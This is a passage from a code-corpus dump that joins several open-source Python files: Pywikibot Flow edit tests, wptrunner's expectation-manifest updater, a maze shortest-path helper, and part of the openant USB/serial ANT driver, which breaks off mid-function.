# Output the final configuration
system.part.writevtk("{}/points_{}.vtk".format(outdir, vel), types=[0])
| gpl-3.0 | -5,037,754,540,907,154,000 | 30.393365 | 91 | 0.565368 | false |
PersianWikipedia/pywikibot-core | tests/flow_edit_tests.py | 2 | 11105 | # -*- coding: utf-8 -*-
"""Edit tests for the flow module."""
#
# (C) Pywikibot team, 2015-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
from pywikibot.exceptions import LockedPage
from pywikibot.flow import Board, Topic, Post
from pywikibot.tools import UnicodeType as unicode
from tests.aspects import TestCase
from tests import unittest
class TestFlowCreateTopic(TestCase):
"""Test the creation of Flow topics."""
family = 'wikipedia'
code = 'test'
user = True
write = True
def test_create_topic(self):
"""Test creation of topic."""
content = 'If you can read this, the Flow code in Pywikibot works!'
board = Board(self.site, 'Talk:Pywikibot test')
topic = board.new_topic('Pywikibot test', content, 'wikitext')
first_post = topic.replies()[0]
wikitext = first_post.get(format='wikitext')
self.assertIn('wikitext', first_post._content)
self.assertNotIn('html', first_post._content)
self.assertIsInstance(wikitext, unicode)
self.assertEqual(wikitext, content)
class TestFlowReply(TestCase):
"""Test replying to existing posts."""
family = 'wikipedia'
code = 'test'
user = True
write = True
@classmethod
def setUpClass(cls):
"""Set up class."""
super(TestFlowReply, cls).setUpClass()
cls._topic_title = 'Topic:Stf56oxx0sd4dkj1'
def test_reply_to_topic(self):
"""Test replying to "topic" (really the topic's root post)."""
# Setup
content = 'I am a reply to the topic. Replying works!'
topic = Topic(self.site, self._topic_title)
old_replies = topic.replies(force=True)[:]
# Reply
reply_post = topic.reply(content, 'wikitext')
# Test content
wikitext = reply_post.get(format='wikitext')
self.assertIn('wikitext', reply_post._content)
self.assertNotIn('html', reply_post._content)
self.assertIsInstance(wikitext, unicode)
self.assertEqual(wikitext, content)
# Test reply list in topic
new_replies = topic.replies(force=True)
self.assertLength(new_replies, len(old_replies) + 1)
def test_reply_to_topic_root(self):
"""Test replying to the topic's root post directly."""
# Setup
content = ("I am a reply to the topic's root post. "
'Replying still works!')
topic = Topic(self.site, self._topic_title)
topic_root = topic.root
old_replies = topic_root.replies(force=True)[:]
# Reply
reply_post = topic_root.reply(content, 'wikitext')
# Test content
wikitext = reply_post.get(format='wikitext')
self.assertIn('wikitext', reply_post._content)
self.assertNotIn('html', reply_post._content)
self.assertIsInstance(wikitext, unicode)
self.assertEqual(wikitext, content)
# Test reply list in topic
new_replies = topic_root.replies(force=True)
self.assertLength(new_replies, len(old_replies) + 1)
def test_reply_to_post(self):
"""Test replying to an ordinary post."""
# Setup
content = 'I am a nested reply to a regular post. Still going strong!'
topic = Topic(self.site, self._topic_title)
root_post = Post(topic, 'stf5bamzx32rj1gt')
old_replies = root_post.replies(force=True)[:]
# Reply
reply_post = root_post.reply(content, 'wikitext')
# Test content
wikitext = reply_post.get(format='wikitext')
self.assertIn('wikitext', reply_post._content)
self.assertNotIn('html', reply_post._content)
self.assertIsInstance(wikitext, unicode)
self.assertEqual(wikitext, content)
# Test reply list in topic
new_replies = root_post.replies(force=True)
self.assertLength(new_replies, len(old_replies) + 1)
def test_nested_reply(self):
"""Test replying to a previous reply to a topic."""
# Setup
first_content = 'I am a reply to the topic with my own replies. Great!'
second_content = ('I am a nested reply. This conversation is '
'getting pretty good!')
topic = Topic(self.site, self._topic_title)
topic_root = topic.root
# First reply
old_root_replies = topic_root.replies(force=True)[:]
first_reply_post = topic_root.reply(first_content, 'wikitext')
# Test first reply's content
first_wikitext = first_reply_post.get(format='wikitext')
self.assertIn('wikitext', first_reply_post._content)
self.assertNotIn('html', first_reply_post._content)
self.assertIsInstance(first_wikitext, unicode)
self.assertEqual(first_wikitext, first_content)
# Test reply list in topic
new_root_replies = topic_root.replies(force=True)
self.assertLength(new_root_replies, len(old_root_replies) + 1)
# Nested reply
old_nested_replies = first_reply_post.replies(force=True)[:]
self.assertListEqual(old_nested_replies, [])
second_reply_post = first_reply_post.reply(second_content,
'wikitext')
# Test nested reply's content
second_wikitext = second_reply_post.get(format='wikitext')
self.assertIn('wikitext', second_reply_post._content)
self.assertNotIn('html', second_reply_post._content)
self.assertIsInstance(second_wikitext, unicode)
self.assertEqual(second_wikitext, second_content)
# Test reply list in first reply
# Broken due to current Flow reply structure (T105438)
# new_nested_replies = first_reply_post.replies(force=True)
# self.assertLength(new_nested_replies, len(old_nested_replies) + 1)
# Current test for nested reply list
self.assertListEqual(old_nested_replies, [])
more_root_replies = topic_root.replies(force=True)
self.assertLength(more_root_replies, len(new_root_replies) + 1)
class TestFlowLockTopic(TestCase):
"""Locking and unlocking topics."""
family = 'wikipedia'
code = 'test'
user = True
write = True
def test_lock_unlock_topic(self):
"""Lock and unlock a test topic."""
# Setup
topic = Topic(self.site, 'Topic:Sn12rdih4iducjsd')
if topic.is_locked:
topic.unlock()
self.assertFalse(topic.is_locked)
# Lock topic
topic.lock('Pywikibot test')
self.assertTrue(topic.is_locked)
# Unlock topic
topic.unlock('Pywikibot test')
self.assertFalse(topic.is_locked)
class TestFlowHide(TestCase):
"""Hiding topics and posts."""
family = 'wikipedia'
code = 'test'
user = True
write = True
def test_hide_topic(self):
"""Hide and restore a test topic."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
if topic.is_moderated:
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
# Hide
topic.hide('Pywikibot test')
self.assertTrue(topic.is_moderated)
# Restore
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
def test_hide_post(self):
"""Hide and restore a test post."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
post = Post(topic, 'sq1qvoig1az8w7cd')
if post.is_moderated:
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
# Hide
post.hide('Pywikibot test')
self.assertTrue(post.is_moderated)
# Restore
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
class TestFlowDelete(TestCase):
"""Deleting topics and posts."""
family = 'wikipedia'
code = 'test'
user = True
write = True
sysop = True
def test_delete_topic(self):
"""Delete and restore a test topic."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
if topic.is_moderated:
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
# Delete
topic.delete_mod('Pywikibot test')
self.assertTrue(topic.is_moderated)
# Restore
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
def test_delete_post(self):
"""Delete and restore a test post."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
post = Post(topic, 'sq1qvoig1az8w7cd')
if post.is_moderated:
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
# Delete
post.delete('Pywikibot test')
self.assertTrue(post.is_moderated)
# Restore
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
class TestFlowSuppress(TestCase):
"""Suppressing topics and posts."""
family = 'wikipedia'
code = 'test'
user = True
write = True
sysop = True
def test_suppress_post(self):
"""Suppress and restore a test post."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
post = Post(topic, 'sq1qvoig1az8w7cd')
if post.is_moderated:
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
# Suppress
post.suppress('Pywikibot test')
self.assertTrue(post.is_moderated)
# Restore
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
def test_suppress_topic(self):
"""Suppress and restore a test topic."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
if topic.is_moderated:
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
# Suppress
topic.suppress('Pywikibot test')
self.assertTrue(topic.is_moderated)
# Restore
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
class TestFlowEditFailure(TestCase):
"""Flow-related edit failure tests."""
family = 'wikipedia'
code = 'test'
user = True
write = -1
def test_reply_to_locked_topic(self):
"""Test replying to locked topic (should raise exception)."""
# Setup
content = 'I am a reply to a locked topic. This is not good!'
topic = Topic(self.site, 'Topic:Smxnipjfs8umm1wt')
# Reply (should raise a LockedPage exception)
self.assertRaises(LockedPage, topic.reply, content, 'wikitext')
topic_root = topic.root
self.assertRaises(LockedPage, topic_root.reply, content, 'wikitext')
topic_reply = topic.root.replies(force=True)[0]
self.assertRaises(LockedPage, topic_reply.reply, content, 'wikitext')
if __name__ == '__main__': # pragma: no cover
try:
unittest.main()
except SystemExit:
pass
| mit | 6,132,236,568,618,926,000 | 32.448795 | 79 | 0.620171 | false |
SimonSapin/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/manifestupdate.py | 4 | 25973 | import itertools
import os
import urlparse
from collections import namedtuple, defaultdict
from wptmanifest.node import (DataNode, ConditionalNode, BinaryExpressionNode,
BinaryOperatorNode, VariableNode, StringNode, NumberNode,
UnaryExpressionNode, UnaryOperatorNode, KeyValueNode)
from wptmanifest.backends import conditional
from wptmanifest.backends.conditional import ManifestItem
import expected
"""Manifest structure used to update the expected results of a test
Each manifest file is represented by an ExpectedManifest that has one
or more TestNode children, one per test in the manifest. Each
TestNode has zero or more SubtestNode children, one for each known
subtest of the test.
In these representations, conditional expressions in the manifest are
not evaluated upfront but stored as python functions to be evaluated
at runtime.
When a result for a test is to be updated, set_result on the
[Sub]TestNode is called to store the new result, alongside the
existing conditional that result's run info matched, if any. Once all
new results are known, coalesce_properties is called to compute the new
set of results and conditionals. The AST of the underlying parsed manifest
is updated with the changes, and the result is serialised to a file.
"""
class ConditionError(Exception):
def __init__(self, cond=None):
self.cond = cond
class UpdateError(Exception):
pass
Value = namedtuple("Value", ["run_info", "value"])
def data_cls_getter(output_node, visited_node):
# visited_node is intentionally unused
if output_node is None:
return ExpectedManifest
elif isinstance(output_node, ExpectedManifest):
return TestNode
elif isinstance(output_node, TestNode):
return SubtestNode
else:
raise ValueError
class ExpectedManifest(ManifestItem):
def __init__(self, node, test_path=None, url_base=None, property_order=None,
boolean_properties=None):
"""Object representing all the tests in a particular manifest
:param node: AST Node associated with this object. If this is None,
a new AST is created to associate with this manifest.
:param test_path: Path of the test file associated with this manifest.
:param url_base: Base url for serving the tests in this manifest.
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
if node is None:
node = DataNode(None)
ManifestItem.__init__(self, node)
self.child_map = {}
self.test_path = test_path
self.url_base = url_base
assert self.url_base is not None
self.modified = False
self.boolean_properties = boolean_properties
self.property_order = property_order
self.update_properties = {
"lsan": LsanUpdate(self),
}
def append(self, child):
ManifestItem.append(self, child)
if child.id in self.child_map:
print "Warning: Duplicate heading %s" % child.id
self.child_map[child.id] = child
def _remove_child(self, child):
del self.child_map[child.id]
ManifestItem._remove_child(self, child)
def get_test(self, test_id):
"""Return a TestNode by test id, or None if no test matches
:param test_id: The id of the test to look up"""
return self.child_map.get(test_id)
def has_test(self, test_id):
"""Boolean indicating whether the current test has a known child test
with id test id
:param test_id: The id of the test to look up"""
return test_id in self.child_map
@property
def url(self):
return urlparse.urljoin(self.url_base,
"/".join(self.test_path.split(os.path.sep)))
def set_lsan(self, run_info, result):
"""Set the result of the test in a particular run
:param run_info: Dictionary of run_info parameters corresponding
to this run
:param result: Lsan violations detected"""
self.update_properties["lsan"].set(run_info, result)
def coalesce_properties(self, stability):
for prop_update in self.update_properties.itervalues():
prop_update.coalesce(stability)
class TestNode(ManifestItem):
def __init__(self, node):
"""Tree node associated with a particular test in a manifest
:param node: AST node associated with the test"""
ManifestItem.__init__(self, node)
self.subtests = {}
self._from_file = True
self.new_disabled = False
self.update_properties = {
"expected": ExpectedUpdate(self),
"max-asserts": MaxAssertsUpdate(self),
"min-asserts": MinAssertsUpdate(self)
}
@classmethod
def create(cls, test_id):
"""Create a TestNode corresponding to a given test
:param test_type: The type of the test
:param test_id: The id of the test"""
url = test_id
name = url.rsplit("/", 1)[1]
node = DataNode(name)
self = cls(node)
self._from_file = False
return self
@property
def is_empty(self):
ignore_keys = set(["type"])
if set(self._data.keys()) - ignore_keys:
return False
return all(child.is_empty for child in self.children)
@property
def test_type(self):
"""The type of the test represented by this TestNode"""
return self.get("type", None)
@property
def id(self):
"""The id of the test represented by this TestNode"""
return urlparse.urljoin(self.parent.url, self.name)
def disabled(self, run_info):
"""Boolean indicating whether this test is disabled when run in an
environment with the given run_info
:param run_info: Dictionary of run_info parameters"""
return self.get("disabled", run_info) is not None
def set_result(self, run_info, result):
"""Set the result of the test in a particular run
:param run_info: Dictionary of run_info parameters corresponding
to this run
:param result: Status of the test in this run"""
self.update_properties["expected"].set(run_info, result)
def set_asserts(self, run_info, count):
"""Set the assert count of a test
"""
self.update_properties["min-asserts"].set(run_info, count)
self.update_properties["max-asserts"].set(run_info, count)
def _add_key_value(self, node, values):
ManifestItem._add_key_value(self, node, values)
if node.data in self.update_properties:
new_updated = []
self.update_properties[node.data].updated = new_updated
for value in values:
new_updated.append((value, []))
def clear(self, key):
"""Clear all the expected data for this test and all of its subtests"""
self.updated = []
if key in self._data:
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == key):
child.remove()
del self._data[key]
break
for subtest in self.subtests.itervalues():
subtest.clear(key)
def append(self, node):
child = ManifestItem.append(self, node)
self.subtests[child.name] = child
def get_subtest(self, name):
"""Return a SubtestNode corresponding to a particular subtest of
the current test, creating a new one if no subtest with that name
already exists.
:param name: Name of the subtest"""
if name in self.subtests:
return self.subtests[name]
else:
subtest = SubtestNode.create(name)
self.append(subtest)
return subtest
def coalesce_properties(self, stability):
for prop_update in self.update_properties.itervalues():
prop_update.coalesce(stability)
class SubtestNode(TestNode):
def __init__(self, node):
assert isinstance(node, DataNode)
TestNode.__init__(self, node)
@classmethod
def create(cls, name):
node = DataNode(name)
self = cls(node)
return self
@property
def is_empty(self):
if self._data:
return False
return True
class PropertyUpdate(object):
property_name = None
cls_default_value = None
value_type = None
def __init__(self, node):
self.node = node
self.updated = []
self.new = []
self.default_value = self.cls_default_value
def set(self, run_info, in_value):
self.check_default(in_value)
value = self.get_value(in_value)
# Add this result to the list of results satisfying
# any condition in the list of updated results it matches
for (cond, values) in self.updated:
if cond(run_info):
values.append(Value(run_info, value))
if value != cond.value_as(self.value_type):
self.node.root.modified = True
break
else:
# We didn't find a previous value for this
self.new.append(Value(run_info, value))
self.node.root.modified = True
def check_default(self, result):
return
def get_value(self, in_value):
return in_value
def coalesce(self, stability=None):
"""Update the underlying manifest AST for this test based on all the
added results.
This will update existing conditionals if they got the same result in
all matching runs in the updated results, will delete existing conditionals
that get more than one different result in the updated run, and add new
conditionals for anything that doesn't match an existing conditional.
Conditionals not matched by any added result are not changed.
When `stability` is not None, disable any test that shows multiple
unexpected results for the same set of parameters.
"""
try:
unconditional_value = self.node.get(self.property_name)
if self.value_type:
unconditional_value = self.value_type(unconditional_value)
except KeyError:
unconditional_value = self.default_value
for conditional_value, results in self.updated:
if not results:
# The conditional didn't match anything in these runs so leave it alone
pass
elif all(results[0].value == result.value for result in results):
# All the new values for this conditional matched, so update the node
result = results[0]
if (result.value == unconditional_value and
conditional_value.condition_node is not None):
if self.property_name in self.node:
self.node.remove_value(self.property_name, conditional_value)
else:
conditional_value.value = self.update_value(conditional_value.value_as(self.value_type),
result.value)
elif conditional_value.condition_node is not None:
# Blow away the existing condition and rebuild from scratch
# This isn't sure to work if we have a conditional later that matches
# these values too, but we can hope, verify that we get the results
# we expect, and if not let a human sort it out
self.node.remove_value(self.property_name, conditional_value)
self.new.extend(results)
elif conditional_value.condition_node is None:
self.new.extend(result for result in results
if result.value != unconditional_value)
# It is an invariant that nothing in new matches an existing
# condition except for the default condition
if self.new:
update_default, new_default_value = self.update_default()
if update_default:
if new_default_value != self.default_value:
self.node.set(self.property_name,
self.update_value(unconditional_value, new_default_value),
condition=None)
else:
try:
self.add_new(unconditional_value, stability)
except UpdateError as e:
print("%s for %s, cannot update %s" % (e, self.node.root.test_path,
self.property_name))
# Remove cases where the value matches the default
if (self.property_name in self.node._data and
len(self.node._data[self.property_name]) > 0 and
self.node._data[self.property_name][-1].condition_node is None and
self.node._data[self.property_name][-1].value_as(self.value_type) == self.default_value):
self.node.remove_value(self.property_name, self.node._data[self.property_name][-1])
# Remove empty properties
if (self.property_name in self.node._data and len(self.node._data[self.property_name]) == 0):
for child in self.node.children:
if (isinstance(child, KeyValueNode) and child.data == self.property_name):
child.remove()
break
def update_default(self):
"""Get the updated default value for the property (i.e. the one chosen when no conditions match).
:returns: (update, new_default_value) where update is a bool indicating whether the property
should be updated, and new_default_value is the value to set if it should."""
raise NotImplementedError
def add_new(self, unconditional_value, stability):
"""Add new conditional values for the property.
Subclasses need not implement this if they only ever update the default value."""
raise NotImplementedError
def update_value(self, old_value, new_value):
"""Get a value to set on the property, given its previous value and the new value from logs.
By default this just returns the new value, but overriding is useful in cases
where we want the new value to be some function of both old and new e.g. max(old_value, new_value)"""
return new_value
class ExpectedUpdate(PropertyUpdate):
property_name = "expected"
def check_default(self, result):
if self.default_value is not None:
assert self.default_value == result.default_expected
else:
self.default_value = result.default_expected
def get_value(self, in_value):
return in_value.status
def update_default(self):
update_default = all(self.new[0].value == result.value
for result in self.new) and not self.updated
new_value = self.new[0].value
return update_default, new_value
def add_new(self, unconditional_value, stability):
try:
conditionals = group_conditionals(
self.new,
property_order=self.node.root.property_order,
boolean_properties=self.node.root.boolean_properties)
except ConditionError as e:
if stability is not None:
self.node.set("disabled", stability or "unstable", e.cond.children[0])
self.node.new_disabled = True
else:
raise UpdateError("Conflicting metadata values")
for conditional_node, value in conditionals:
if value != unconditional_value:
self.node.set(self.property_name, value, condition=conditional_node.children[0])
class MaxAssertsUpdate(PropertyUpdate):
property_name = "max-asserts"
cls_default_value = 0
value_type = int
def update_value(self, old_value, new_value):
new_value = self.value_type(new_value)
if old_value is not None:
old_value = self.value_type(old_value)
if old_value is not None and old_value < new_value:
return new_value + 1
if old_value is None:
return new_value + 1
return old_value
def update_default(self):
"""For asserts we always update the default value and never add new conditionals.
The value we set as the default is the maximum of the current default or one more than the
number of asserts we saw in any configuration."""
# Current values
values = []
current_default = None
if self.property_name in self.node._data:
current_default = [item for item in
self.node._data[self.property_name]
if item.condition_node is None]
if current_default:
values.append(int(current_default[0].value))
values.extend(item.value for item in self.new)
values.extend(item.value for item in
itertools.chain.from_iterable(results for _, results in self.updated))
new_value = max(values)
return True, new_value
class MinAssertsUpdate(PropertyUpdate):
property_name = "min-asserts"
cls_default_value = 0
value_type = int
def update_value(self, old_value, new_value):
new_value = self.value_type(new_value)
if old_value is not None:
old_value = self.value_type(old_value)
if old_value is not None and new_value < old_value:
return 0
if old_value is None:
# If we are getting some asserts for the first time, set the minimum to 0
return new_value
return old_value
def update_default(self):
"""For asserts we always update the default value and never add new conditionals.
This is either set to the current value or one less than the number of asserts
we saw, whichever is lower."""
values = []
current_default = None
if self.property_name in self.node._data:
current_default = [item for item in
self.node._data[self.property_name]
if item.condition_node is None]
if current_default:
values.append(current_default[0].value_as(self.value_type))
values.extend(max(0, item.value) for item in self.new)
values.extend(max(0, item.value) for item in
itertools.chain.from_iterable(results for _, results in self.updated))
new_value = min(values)
return True, new_value
class LsanUpdate(PropertyUpdate):
property_name = "lsan-allowed"
cls_default_value = None
def get_value(self, result):
# If we have an allowed_match that matched, return None
# This value is ignored later (because it matches the default)
# We do that because then if we allow a failure in foo/__dir__.ini
# we don't want to update foo/bar/__dir__.ini with the same rule
if result[1]:
return None
# Otherwise return the topmost stack frame
# TODO: there is probably some improvement to be made by looking for a "better" stack frame
return result[0][0]
def update_value(self, old_value, new_value):
if isinstance(new_value, (str, unicode)):
new_value = {new_value}
else:
new_value = set(new_value)
if old_value is None:
old_value = set()
old_value = set(old_value)
return sorted((old_value | new_value) - {None})
def update_default(self):
current_default = None
if self.property_name in self.node._data:
current_default = [item for item in
self.node._data[self.property_name]
if item.condition_node is None]
if current_default:
current_default = current_default[0].value
new_values = [item.value for item in self.new]
new_value = self.update_value(current_default, new_values)
return True, new_value if new_value else None
def group_conditionals(values, property_order=None, boolean_properties=None):
"""Given a list of Value objects, return a list of
(conditional_node, status) pairs representing the conditional
expressions that are required to match each status
:param values: List of Values
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
by_property = defaultdict(set)
for run_info, value in values:
for prop_name, prop_value in run_info.iteritems():
by_property[(prop_name, prop_value)].add(value)
if property_order is None:
property_order = ["debug", "os", "version", "processor", "bits"]
if boolean_properties is None:
boolean_properties = set(["debug"])
else:
boolean_properties = set(boolean_properties)
# If we have more than one value, remove any properties that are common
# for all the values
if len(values) > 1:
for key, statuses in by_property.copy().iteritems():
if len(statuses) == len(values):
del by_property[key]
if not by_property:
raise ConditionError
properties = set(item[0] for item in by_property.iterkeys())
include_props = []
for prop in property_order:
if prop in properties:
include_props.append(prop)
conditions = {}
for run_info, value in values:
prop_set = tuple((prop, run_info[prop]) for prop in include_props)
if prop_set in conditions:
if conditions[prop_set][1] != value:
# A prop_set contains contradictory results
raise ConditionError(make_expr(prop_set, value, boolean_properties))
continue
expr = make_expr(prop_set, value, boolean_properties=boolean_properties)
conditions[prop_set] = (expr, value)
return conditions.values()
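# (Illustrative example, not part of the original module.) Given two runs that
# differ only in the boolean "debug" property:
#
#   values = [Value({"os": "linux", "debug": True}, "FAIL"),
#             Value({"os": "linux", "debug": False}, "PASS")]
#
# the shared ("os", "linux") property is common to all values and is dropped,
# and group_conditionals returns one (conditional AST, value) pair per
# remaining combination, roughly equivalent to "if debug: FAIL" and
# "if not debug: PASS".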
def make_expr(prop_set, rhs, boolean_properties=None):
"""Create an AST that returns the value ``status`` given all the
properties in prop_set match.
:param prop_set: tuple of (property name, value) pairs for each
property in this expression and the value it must match
:param status: Status on RHS when all the given properties match
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
root = ConditionalNode()
assert len(prop_set) > 0
expressions = []
for prop, value in prop_set:
number_types = (int, float, long)
value_cls = (NumberNode
if type(value) in number_types
else StringNode)
if prop not in boolean_properties:
expressions.append(
BinaryExpressionNode(
BinaryOperatorNode("=="),
VariableNode(prop),
value_cls(unicode(value))
))
else:
if value:
expressions.append(VariableNode(prop))
else:
expressions.append(
UnaryExpressionNode(
UnaryOperatorNode("not"),
VariableNode(prop)
))
if len(expressions) > 1:
prev = expressions[-1]
for curr in reversed(expressions[:-1]):
node = BinaryExpressionNode(
BinaryOperatorNode("and"),
curr,
prev)
prev = node
else:
node = expressions[0]
root.append(node)
if type(rhs) in number_types:
rhs_node = NumberNode(rhs)
else:
rhs_node = StringNode(rhs)
root.append(rhs_node)
return root
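# (Illustrative example, not part of the original module.) make_expr only
# builds the AST; serialised back to manifest syntax, a call such as
#
#   make_expr((("os", "linux"), ("debug", True)), "FAIL", {"debug"})
#
# corresponds to the condition 'if os == "linux" and debug: FAIL', where the
# boolean "debug" property is emitted as a bare variable rather than as a
# comparison.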
def get_manifest(metadata_root, test_path, url_base, property_order=None,
boolean_properties=None):
"""Get the ExpectedManifest for a particular test path, or None if there is no
metadata stored for that test path.
:param metadata_root: Absolute path to the root of the metadata directory
:param test_path: Path to the test(s) relative to the test root
:param url_base: Base url for serving the tests in this manifest
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
manifest_path = expected.expected_path(metadata_root, test_path)
try:
with open(manifest_path) as f:
return compile(f, test_path, url_base, property_order=property_order,
boolean_properties=boolean_properties)
except IOError:
return None
def compile(manifest_file, test_path, url_base, property_order=None,
boolean_properties=None):
return conditional.compile(manifest_file,
data_cls_getter=data_cls_getter,
test_path=test_path,
url_base=url_base,
property_order=property_order,
boolean_properties=boolean_properties)
| mpl-2.0 | -1,674,319,530,333,104,000 | 37.027818 | 109 | 0.606707 | false |
TeamRoquette/PyRat | lib/shortestPaths.py | 1 | 1218 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
def orderPath (nodesDict, start, stop, path):
"""
Internal function used by shortestWay to
put the nodes from the routing table into order.
Return the shortest path from start to stop.
"""
if start == stop:
return path + [start]
return orderPath (nodesDict, start, nodesDict[stop][0], path + [stop])
def dijkstra (mazeMap, startLocation) :
"""
Return the routing table of every node, starting from startLocation.
"""
bestNodes = {(startLocation):((),0)}
toseeNodes = [startLocation]
while toseeNodes :
node = toseeNodes.pop(0)
neighbours = mazeMap[node]
dist = bestNodes.get(node, ([], float('inf')))[1]
for (n,d) in neighbours :
if bestNodes.get(n, ([], float('inf')))[1] > d + dist :
bestNodes[n] = (node, d + dist)
toseeNodes.append(n)
return bestNodes
def shortestWay (mazeMap, startLocation, stopLocation):
"""
Return the shortest path from startLocation to stopLocation.
Uses Dijkstra's algorithm.
"""
return orderPath (dijkstra (mazeMap, startLocation), startLocation, stopLocation, [])
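# (Illustrative usage, not part of the original module.) mazeMap is assumed to
# map each node to a list of (neighbour, distance) pairs, e.g.:
#
#   maze = {(0, 0): [((0, 1), 1)],
#           (0, 1): [((0, 0), 1), ((1, 1), 1)],
#           (1, 1): [((0, 1), 1)]}
#   shortestWay(maze, (0, 0), (1, 1))   # -> [(1, 1), (0, 1), (0, 0)]
#
# Note that the returned list is ordered from stopLocation back to
# startLocation, as built by orderPath.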
| mit | -3,572,513,400,971,579,000 | 25.478261 | 89 | 0.610837 | false |
jforge/openant | ant/base/driver.py | 1 | 8107 | # Ant
#
# Copyright (c) 2012, Gustav Tiger <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import, print_function
import logging
_logger = logging.getLogger("ant.base.driver")
class DriverException(Exception):
pass
class DriverNotFound(DriverException):
pass
class DriverTimeoutException(DriverException):
pass
class Driver:
@classmethod
def find(cls):
pass
def open(self):
pass
def close(self):
pass
def read(self):
pass
def write(self, data):
pass
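# (Illustrative usage, not part of the original module.) A caller is expected
# to pick whichever backend is available and then exchange raw ANT messages:
#
#   driver = find_driver()   # raises DriverNotFound if no backend matches
#   driver.open()
#   driver.write(data)       # data: byte array holding one ANT message
#   response = driver.read()
#   driver.close()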
drivers = []
try:
import array
import os
import os.path
import serial
class SerialDriver(Driver):
ID_VENDOR = 0x0fcf
ID_PRODUCT = 0x1004
@classmethod
def find(cls):
return cls.get_url() is not None
@classmethod
def get_url(cls):
try:
path = '/sys/bus/usb-serial/devices'
for device in os.listdir(path):
try:
device_path = os.path.realpath(os.path.join(path, device))
device_path = os.path.join(device_path, "../../")
ven = int(open(os.path.join(device_path, 'idVendor')).read().strip(), 16)
pro = int(open(os.path.join(device_path, 'idProduct')).read().strip(), 16)
if ven == cls.ID_VENDOR or cls.ID_PRODUCT == pro:
return os.path.join("/dev", device)
except:
continue
return None
except OSError:
return None
def open(self):
# TODO find correct port on our own, could be done with
# serial.tools.list_ports, but that seems to have some
# problems at the moment.
try:
self._serial = serial.serial_for_url(self.get_url(), 115200)
except serial.SerialException as e:
raise DriverException(e)
print("Serial information:")
print("name: ", self._serial.name)
print("port: ", self._serial.port)
print("baudrate: ", self._serial.baudrate)
print("bytesize: ", self._serial.bytesize)
print("parity: ", self._serial.parity)
print("stopbits: ", self._serial.stopbits)
print("timeout: ", self._serial.timeout)
print("writeTimeout: ", self._serial.writeTimeout)
print("xonxoff: ", self._serial.xonxoff)
print("rtscts: ", self._serial.rtscts)
print("dsrdtr: ", self._serial.dsrdtr)
print("interCharTimeout:", self._serial.interCharTimeout)
self._serial.timeout = 0
def read(self):
data = self._serial.read(4096)
# print "serial read", len(data), type(data), data
return array.array('B', data)
def write(self, data):
try:
# print "serial write", type(data), data
self._serial.write(data)
except serial.SerialTimeoutException as e:
raise DriverTimeoutException(e)
def close(self):
self._serial.close()
drivers.append(SerialDriver)
except ImportError:
pass
try:
import usb.core
import usb.util
class USBDriver(Driver):
def __init__(self):
pass
@classmethod
def find(cls):
return usb.core.find(idVendor=cls.ID_VENDOR, idProduct=cls.ID_PRODUCT) is not None
def open(self):
# Find USB device
_logger.debug("USB Find device, vendor %#04x, product %#04x", self.ID_VENDOR, self.ID_PRODUCT)
dev = usb.core.find(idVendor=self.ID_VENDOR, idProduct=self.ID_PRODUCT)
# was it found?
if dev is None:
raise ValueError('Device not found')
_logger.debug("USB Config values:")
for cfg in dev:
_logger.debug(" Config %s", cfg.bConfigurationValue)
for intf in cfg:
_logger.debug(" Interface %s, Alt %s", str(intf.bInterfaceNumber), str(intf.bAlternateSetting))
for ep in intf:
_logger.debug(" Endpoint %s", str(ep.bEndpointAddress))
# detach a kernel driver (TODO: should probably reattach later)
try:
if dev.is_kernel_driver_active(0):
_logger.debug("A kernel driver active, detatching")
dev.detach_kernel_driver(0)
else:
_logger.debug("No kernel driver active")
except NotImplementedError as e:
_logger.warning("Could not check if kernel driver was active, not implemented in usb backend")
